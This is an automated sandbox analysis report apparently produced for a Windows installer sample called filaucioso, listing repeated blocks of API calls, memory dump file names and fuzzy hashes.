                                                                        • String ID:
                                                                        • API String ID: 1655745494-0
                                                                        • Opcode ID: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                        • Instruction ID: 89e2ffb4eeb90fd48554f64b8be6f4befc75c99c48748cc7a9a51ea4a82828fd
                                                                        • Opcode Fuzzy Hash: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                        • Instruction Fuzzy Hash: 79E0E531115A5096C21057348E0CB5F2A98DFC6724F05093AF992F30C0D77C49469A7E
                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 0040250A
                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1E85.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3356406503-0
                                                                        • Opcode ID: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                        • Instruction ID: e432cc5542b3a476208e1b79bea1c70747d30db9775ab40f8372a11ce444457e
                                                                        • Opcode Fuzzy Hash: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                        • Instruction Fuzzy Hash: 5E118C71901205FEDB11CF64CA5D9AEBAB4AF19348F60447FE442B62C0D6B88A45DB2D
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                        • Instruction ID: e022dd21a705f7d2fe13c48a1103892d377d282aa69ae92f3ff2ae7c0e9cbe23
                                                                        • Opcode Fuzzy Hash: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                        • Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B2A36A8E751354F10813FF955F65F2D678CC028B4C
                                                                        APIs
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402409
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteValue
                                                                        • String ID:
                                                                        • API String ID: 2831762973-0
                                                                        • Opcode ID: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                        • Instruction ID: 49501c94728b366df12ca2e4d909b612e79837c42632e001697d6088b151e408
                                                                        • Opcode Fuzzy Hash: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                        • Instruction Fuzzy Hash: 5BF0BB32A00120ABD701AFB89B4DBAE72B99B54314F15417FF502B72C1D5FC5E01876D
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040260B
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll, xrefs: 004025FC, 00402621
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll
                                                                        • API String ID: 1659193697-921286422
                                                                        • Opcode ID: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                        • Instruction ID: 6bdf981ca1be840b674a071183a736e23abd1ab340c7258522d34cd24c38b4c9
                                                                        • Opcode Fuzzy Hash: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                        • Instruction Fuzzy Hash: 67F0E971948340ABC701EBB55A8999F66B4DBC5304B20483FE001B71C2C5BC4441961E
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableShow
                                                                        • String ID:
                                                                        • API String ID: 1136574915-0
                                                                        • Opcode ID: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                        • Instruction ID: 33cda2ed04c3da629839a1ed70eaf652a1c817d3d699623c6adcec252e127601
                                                                        • Opcode Fuzzy Hash: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                        • Instruction Fuzzy Hash: 4FE01272A04210DFD705DFA8AE859AE77B4FB84325F10493BE102F11D1D7B85841966D
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000), ref: 00401581
                                                                        • ShowWindow.USER32(00010490), ref: 00401596
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
                                                                        • Instruction ID: 9939d567be1ae21951fa300f882ca9363235c0aad14cd7a96026ed132ac70b09
                                                                        • Opcode Fuzzy Hash: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
                                                                        • Instruction Fuzzy Hash: 50E0E6B6710114ABCB15DB58EED087E73B9EBC5350750453FD902F36A1C6789D418B68
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                          • Part of subcall function 00406317: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                          • Part of subcall function 00406317: wsprintfA.USER32 ref: 00406367
                                                                          • Part of subcall function 00406317: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                        • Instruction ID: 1c2fb029b914f91a359858a8292288339c30c15ea481b8388e8a6490942e710a
                                                                        • Opcode Fuzzy Hash: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                        • Instruction Fuzzy Hash: C3E086326042105BD62156709E0493B62ACDF84700306083EFE47F2240D73CDC31A6A9
                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 00405B8A
                                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                        • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                        • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                        • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                        • Instruction ID: cc84bc49ba1b043e1d2796ac572287907eda555ef0407ac86e19afeaae62c947
                                                                        • Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                        • Instruction Fuzzy Hash: 7FD0C972504425AFC2102728AE0C89BBB65DB542B17028A35FDA5A22B1DB304C569A99
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040323B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040565D
                                                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040566B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                        • Instruction ID: c315ded7713b9b4a851445b4695441f34a70141ed77257200a8001455a195bbd
                                                                        • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                        • Instruction Fuzzy Hash: 33C08C30200501DBD6000B308F08F073A51AB80780F01883E608AE00B0CA318055CD2E
                                                                        APIs
                                                                        • EnumWindows.USER32(00000000), ref: 6E3A2AF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: EnumWindows
                                                                        • String ID:
                                                                        • API String ID: 1129996299-0
                                                                        • Opcode ID: a291f20e01c3b5a67e63c4891d94ce2d52b2f2fc4fd4cb2e93c6a64314809fcc
                                                                        • Instruction ID: 786ec5a932f54a580f5587a6f6aacd8847e197355d36c4a7c769f0ee07185e49
                                                                        • Opcode Fuzzy Hash: a291f20e01c3b5a67e63c4891d94ce2d52b2f2fc4fd4cb2e93c6a64314809fcc
                                                                        • Instruction Fuzzy Hash: 7B414D72504604DFDB20DFEEEA84B9DB76CEB16718F204C69E644C7110DB3598D2EBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: wsprintf
                                                                        • String ID:
                                                                        • API String ID: 2111968516-0
                                                                        • Opcode ID: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                        • Instruction ID: eb4a75d755b27d484e80f31c5275a4a508bcecdbc7e909d2d8288c975618dcdd
                                                                        • Opcode Fuzzy Hash: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                        • Instruction Fuzzy Hash: A621C970C0428AAACF219F684A455BFBB709F11314F14447FE891B63D2C1BD8981CB19
                                                                        APIs
                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
